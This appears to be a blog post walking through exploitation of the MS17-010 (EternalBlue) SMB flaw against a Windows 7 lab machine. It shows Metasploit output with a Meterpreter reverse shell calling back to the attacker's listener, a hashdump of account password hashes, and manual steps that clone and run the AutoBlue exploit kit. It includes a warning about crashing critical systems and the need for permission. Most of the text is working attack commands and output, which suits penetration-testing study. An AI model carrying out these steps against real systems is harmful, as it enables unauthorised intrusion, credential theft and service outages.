[*] 10.0.2.7:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.0.2.7
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 10.0.2.7:49159) at 2023-03-23 10:10:34 -0400
[+] 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f580a1940b1f6759fbdd9f5c482ccdbb:::
user:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
meterpreter >
How to do the same in manual method
Google Search for - eternal blue github
(kali㉿kali)-[/opt]
└─$ sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
┌──(kali㉿kali)-[/opt]
└─$ cd AutoBlue-MS17-010
┌──(kali㉿kali)-[/opt/AutoBlue-MS17-010]
└─$ pip install -r requirements.txt
┌──(kali㉿kali)-[/opt/AutoBlue-MS17-010]
└─$ python eternal_checker.py 10.0.2.7
[*] Target OS: Windows 7 Ultimate 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done
These exploits might take the machine down, if the systems are critical like in public sector- hospitals/ other civil service, just take the screen shots and get permission to do the exploits
┌──(kali㉿kali)-[/opt/AutoBlue-MS17-010]
└─$ cd shellcode
 |
| shell_prep-sh |
Setting payload
 |
| Setting payload 01 |
 |
| Setting payload 02 |
 |
| Setting Listener |
 |
| Running exploit |
Vuln machine crashed
THe above example explains:-
These exploits might take the machine down, if the systems are critical like in public sector- hospitals/ other civil service, just take the screen shots and get permission to do the exploits .
************************************************************************************
Comments
Post a Comment